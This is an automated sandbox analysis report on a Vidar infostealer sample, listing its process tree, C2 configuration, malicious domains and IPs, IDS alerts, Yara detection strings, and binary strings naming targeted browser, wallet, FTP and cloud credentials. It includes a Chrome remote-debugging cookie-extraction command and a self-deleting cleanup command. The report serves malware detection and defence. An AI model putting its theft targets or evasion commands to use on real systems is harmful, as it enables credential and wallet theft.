Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe
Analysis ID:1610535
MD5:d41aed28538e53598c5ee0b61a7474fb
SHA1:29a1d2fda339625e15739e193fffafe3a636f8b9
SHA256:03f111a7553d3e698a07aea301f9be5d29bcde70513a1323283db3e2e4045d95
Tags:exeVidaruser-SecuriteInfoCom
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Vidar stealer
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Searches for specific processes (likely to inject)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe" MD5: D41AED28538E53598C5EE0B61A7474FB)
    • BitLockerToGo.exe (PID: 3704 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • chrome.exe (PID: 5796 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 2836 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2288,i,14542950946606832466,4016932128899336426,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • cmd.exe (PID: 8084 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" & rd /s /q "C:\ProgramData\srq9h" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 8096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 8140 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000004.00000003.2029593056.0000000003342000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
      00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000000.00000003.1966662723.000000000A178000.00000004.00001000.00020000.00000000.sdmpMsfpayloads_msf_9Metasploit Payloads - file msf.war - contentsFlorian Roth
        • 0x0:$x1: 4d5a9000030000000
        00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmpinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
          • 0x1ad7f:$str01: MachineID:
          • 0x19d4f:$str02: Work Dir: In memory
          • 0x1ae27:$str03: [Hardware]
          • 0x1ad68:$str04: VideoCard:
          • 0x1a4c0:$str05: [Processes]
          • 0x1a4cc:$str06: [Software]
          • 0x19de0:$str07: information.txt
          • 0x1aabc:$str08: %s\*
          • 0x1ab09:$str08: %s\*
          • 0x19ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
          • 0x1a392:$str12: UseMasterPassword
          • 0x1ae33:$str13: Soft: WinSCP
          • 0x1a86b:$str14: <Pass encoding="base64">
          • 0x1ae16:$str15: Soft: FileZilla
          • 0x19dd2:$str16: passwords.txt
          • 0x1a3bd:$str17: build_id
          • 0x1a484:$str18: file_data
          Click to see the 12 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.BitLockerToGo.exe.400000.0.raw.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
            0.2.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.a25c000.1.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
            • 0x1917f:$str01: MachineID:
            • 0x19227:$str03: [Hardware]
            • 0x19168:$str04: VideoCard:
            • 0x188c0:$str05: [Processes]
            • 0x188cc:$str06: [Software]
            • 0x18ebc:$str08: %s\*
            • 0x18f09:$str08: %s\*
            • 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
            • 0x18792:$str12: UseMasterPassword
            • 0x19233:$str13: Soft: WinSCP
            • 0x18c6b:$str14: <Pass encoding="base64">
            • 0x19216:$str15: Soft: FileZilla
            • 0x187bd:$str17: build_id
            • 0x18884:$str18: file_data
            4.2.BitLockerToGo.exe.400000.0.raw.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
            • 0x1ad7f:$str01: MachineID:
            • 0x19d4f:$str02: Work Dir: In memory
            • 0x1ae27:$str03: [Hardware]
            • 0x1ad68:$str04: VideoCard:
            • 0x1a4c0:$str05: [Processes]
            • 0x1a4cc:$str06: [Software]
            • 0x19de0:$str07: information.txt
            • 0x1aabc:$str08: %s\*
            • 0x1ab09:$str08: %s\*
            • 0x19ffd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
            • 0x1a392:$str12: UseMasterPassword
            • 0x1ae33:$str13: Soft: WinSCP
            • 0x1a86b:$str14: <Pass encoding="base64">
            • 0x1ae16:$str15: Soft: FileZilla
            • 0x19dd2:$str16: passwords.txt
            • 0x1a3bd:$str17: build_id
            • 0x1a484:$str18: file_data
            0.3.SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe.9dda000.3.unpackinfostealer_win_vidar_strings_nov23Finds Vidar samples based on the specific stringsSekoia.io
            • 0x1917f:$str01: MachineID:
            • 0x19227:$str03: [Hardware]
            • 0x19168:$str04: VideoCard:
            • 0x188c0:$str05: [Processes]
            • 0x188cc:$str06: [Software]
            • 0x18ebc:$str08: %s\*
            • 0x18f09:$str08: %s\*
            • 0x183fd:$str11: Software\Martin Prikryl\WinSCP 2\Configuration
            • 0x18792:$str12: UseMasterPassword
            • 0x19233:$str13: Soft: WinSCP
            • 0x18c6b:$str14: <Pass encoding="base64">
            • 0x19216:$str15: Soft: FileZilla
            • 0x187bd:$str17: build_id
            • 0x18884:$str18: file_data
            4.2.BitLockerToGo.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 5 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe", ParentImage: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe, ParentProcessId: 3704, ParentProcessName: BitLockerToGo.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 5796, ProcessName: chrome.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-09T16:28:49.016594+010020442471Malware Command and Control Activity Detected5.75.215.154443192.168.2.449741TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-09T16:28:50.439671+010020518311Malware Command and Control Activity Detected5.75.215.154443192.168.2.449742TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-09T16:28:47.677599+010020490871A Network Trojan was detected192.168.2.4497405.75.215.154443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-09T16:28:51.845049+010020593311Malware Command and Control Activity Detected192.168.2.4497435.75.215.154443TCP
              2025-02-09T16:28:52.948352+010020593311Malware Command and Control Activity Detected192.168.2.4497445.75.215.154443TCP
              2025-02-09T16:29:01.110611+010020593311Malware Command and Control Activity Detected192.168.2.4560565.75.215.154443TCP
              2025-02-09T16:29:02.101126+010020593311Malware Command and Control Activity Detected192.168.2.4560575.75.215.154443TCP
              2025-02-09T16:29:03.031636+010020593311Malware Command and Control Activity Detected192.168.2.4560585.75.215.154443TCP
              2025-02-09T16:29:05.105143+010020593311Malware Command and Control Activity Detected192.168.2.4560595.75.215.154443TCP
              2025-02-09T16:29:06.959307+010020593311Malware Command and Control Activity Detected192.168.2.4560605.75.215.154443TCP
              2025-02-09T16:29:07.212570+010020593311Malware Command and Control Activity Detected192.168.2.4560615.75.215.154443TCP
              2025-02-09T16:29:08.144725+010020593311Malware Command and Control Activity Detected192.168.2.4560625.75.215.154443TCP
              2025-02-09T16:29:09.188428+010020593311Malware Command and Control Activity Detected192.168.2.4560635.75.215.154443TCP
              2025-02-09T16:29:11.427542+010020593311Malware Command and Control Activity Detected192.168.2.4560655.75.215.154443TCP
              2025-02-09T16:29:12.472976+010020593311Malware Command and Control Activity Detected192.168.2.4560765.75.215.154443TCP
              2025-02-09T16:29:14.765915+010020593311Malware Command and Control Activity Detected192.168.2.4560895.75.215.154443TCP
              2025-02-09T16:29:34.515456+010020593311Malware Command and Control Activity Detected192.168.2.4562025.75.215.154443TCP
              2025-02-09T16:29:35.387095+010020593311Malware Command and Control Activity Detected192.168.2.4562125.75.215.154443TCP
              2025-02-09T16:29:36.408346+010020593311Malware Command and Control Activity Detected192.168.2.4562195.75.215.154443TCP
              2025-02-09T16:29:37.629176+010020593311Malware Command and Control Activity Detected192.168.2.4562265.75.215.154443TCP
              2025-02-09T16:29:38.334861+010020593311Malware Command and Control Activity Detected192.168.2.4562345.75.215.154443TCP
              2025-02-09T16:29:39.472173+010020593311Malware Command and Control Activity Detected192.168.2.4562425.75.215.154443TCP
              2025-02-09T16:29:40.433559+010020593311Malware Command and Control Activity Detected192.168.2.4562485.75.215.154443TCP
              2025-02-09T16:29:41.494319+010020593311Malware Command and Control Activity Detected192.168.2.4562565.75.215.154443TCP
              2025-02-09T16:29:43.279788+010020593311Malware Command and Control Activity Detected192.168.2.4562635.75.215.154443TCP
              2025-02-09T16:29:44.028835+010020593311Malware Command and Control Activity Detected192.168.2.4562675.75.215.154443TCP
              2025-02-09T16:29:45.433625+010020593311Malware Command and Control Activity Detected192.168.2.4562775.75.215.154443TCP
              2025-02-09T16:29:46.526140+010020593311Malware Command and Control Activity Detected192.168.2.4562865.75.215.154443TCP
              2025-02-09T16:29:47.469084+010020593311Malware Command and Control Activity Detected192.168.2.4562945.75.215.154443TCP
              2025-02-09T16:29:48.490629+010020593311Malware Command and Control Activity Detected192.168.2.4563015.75.215.154443TCP
              2025-02-09T16:29:49.513217+010020593311Malware Command and Control Activity Detected192.168.2.4563115.75.215.154443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-09T16:29:02.101126+010028596361Malware Command and Control Activity Detected192.168.2.4560575.75.215.154443TCP
              2025-02-09T16:29:03.031636+010028596361Malware Command and Control Activity Detected192.168.2.4560585.75.215.154443TCP
              2025-02-09T16:29:05.105143+010028596361Malware Command and Control Activity Detected192.168.2.4560595.75.215.154443TCP
              2025-02-09T16:29:07.212570+010028596361Malware Command and Control Activity Detected192.168.2.4560615.75.215.154443TCP
              2025-02-09T16:29:08.144725+010028596361Malware Command and Control Activity Detected192.168.2.4560625.75.215.154443TCP
              2025-02-09T16:29:09.188428+010028596361Malware Command and Control Activity Detected192.168.2.4560635.75.215.154443TCP
              2025-02-09T16:29:11.427542+010028596361Malware Command and Control Activity Detected192.168.2.4560655.75.215.154443TCP
              2025-02-09T16:29:12.472976+010028596361Malware Command and Control Activity Detected192.168.2.4560765.75.215.154443TCP
              2025-02-09T16:29:14.765915+010028596361Malware Command and Control Activity Detected192.168.2.4560895.75.215.154443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-09T16:28:46.356523+010028593781Malware Command and Control Activity Detected192.168.2.4497395.75.215.154443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://safewat.pro/Avira URL Cloud: Label: malware
              Source: https://safewat.pro/5Avira URL Cloud: Label: malware
              Found malware configuration
              Source: 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199824159981", "Botnet": "a110mgz"}
              Multi AV Scanner detection for submitted file
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeReversingLabs: Detection: 39%
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeVirustotal: Detection: 45%Perma Link
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree,4_2_00405FE7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree,4_2_0040E7E9
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey,4_2_00406062
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040627F LocalAlloc,BCryptDecrypt,4_2_0040627F
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey,4_2_0040609C
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
              Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 5.75.215.154:443 -> 192.168.2.4:56311 version: TLS 1.2
              Source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2comctl32gdi32:225121Windows 11HTTP/1.1HARDWARE\DESCRIPTION\System\CentralProcessor\0abcdefgh
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdbA source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: cryptosetup.pdbGCTL source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: cryptosetup.pdb source: BitLockerToGo.exe, 00000004.00000002.2691298161.000000000599E000.00000004.00000020.00020000.00000000.sdmp, wtjw4e.4.dr
              Source: Binary string: BitLockerToGo.pdbGCTL source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966719770.000000000A142000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Users\Administrator\Desktop\vdr1\Release\vdr1.pdb source: SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967366423.0000000009F16000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967558818.0000000009E6A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976184715.0000000009CE2000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1976746685.0000000009E7A000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1968679137.0000000009CE0000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1967984256.0000000009DEC000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000002.1977257016.000000000A25C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Inject5.16384.2170.8558.exe, 00000000.00000003.1966093639.000000000A252000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, BitLockerToGo.exe, 00000004.00000002.2689553328.0000000000400000.00000040.00000400.00020000.00000000.sdmp
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose,4_2_00407891
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,4_2_0040A69C
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,4_2_00408776
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00413B10 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose,4_2_00413B10
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose,4_2_004013DA
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_00406784
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00411187 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,4_2_00411187
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412A5D wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00412A5D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,4_2_00409C78
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,4_2_00408224
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeCode function: 4_2_00412539 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA,4_2_00412539
